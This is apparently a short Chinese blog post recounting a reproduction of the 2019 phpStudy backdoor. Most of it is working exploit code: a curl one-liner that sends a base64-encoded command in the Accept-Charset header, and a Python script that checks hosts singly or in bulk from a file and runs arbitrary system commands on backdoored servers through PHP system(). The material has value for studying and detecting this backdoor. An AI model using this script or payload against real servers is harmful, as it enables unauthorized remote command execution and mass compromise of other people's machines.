phpstudy复现

Sep 30, 2019 00:00 · 346 words · 1 minute read poc

phpstudy复现

为什么会复现

明队给我考了一份源码,说是审一审

熟练的打开尘封的win,源码一拖,打开就几个php文件,网站都还没有搭建起来

朋友圈就刷爆了phpstudy后门的消息,我怀疑明队在搞我

在复现的过程中,phpstudy的目录当时是做xss持久化,注册了service worker 谷歌和火狐疯狂弹窗,最后重新安装火狐

别人的poc

curl http://localhost/1.php -H 'Accept-Encoding:gzip,deflate' -H 'Accept-Charset:ZWNobyBgaXBjb25maWdgOw=='

写了一下poc试试

# python test.py 127.0.0.1 手工输入地址检测
# python test.py 1.txt 批量检测txt里面的地址
# python test.py 127.0.0.1 ipconfig

import requests
import sys
import base64


def check_phpinfo(url):
    print(url)
    payload = base64.b64encode("echo phpinfo();".encode('utf-8'))
    headers = {
        "accept-charset": f"{str(payload, 'utf-8')}",
        "Accept-Encoding": "gzip,deflate",
    }
    try:
        r = requests.get(url, headers=headers)
        if r.status_code == 200 and "phpinfo" in r.text:
            print(f"BackDoor:Server= {r.headers.get('Server')}")
        else:
            print("No BackDoor Exit!")
    except:
        print('bug')

def batch(txt):
    with open(f'{txt}', 'r', encoding='utf-8') as f:
        for u in f:
            if 'http' not in u and 'https' not in u:
                u = 'http://' + u
            u=u.replace('\n',' ')
            check_phpinfo(u)

def execute(url, cmd):
    payload = base64.b64encode(f"system('{cmd}');".encode('utf-8'))
    headers = {
        "accept-charset": f"{str(payload, 'utf-8')}",
        "Accept-Encoding": "gzip,deflate",
    }
    r1 = requests.get(url, headers=headers)
    print(r1.text)





if __name__ == '__main__':
    input = sys.argv[:]
    url = input[1]
    if 'http' not in url and 'https' not in url:
        url = 'http://' + url

    if len(input)==2 and 'txt' in input[1]:
        txt=input[1]
        batch(txt)
    else:
        check_phpinfo(url)

    if len(input)>2:
        cmd=input[2:]
        cmd=' '.join(cmd)
        execute(url,cmd)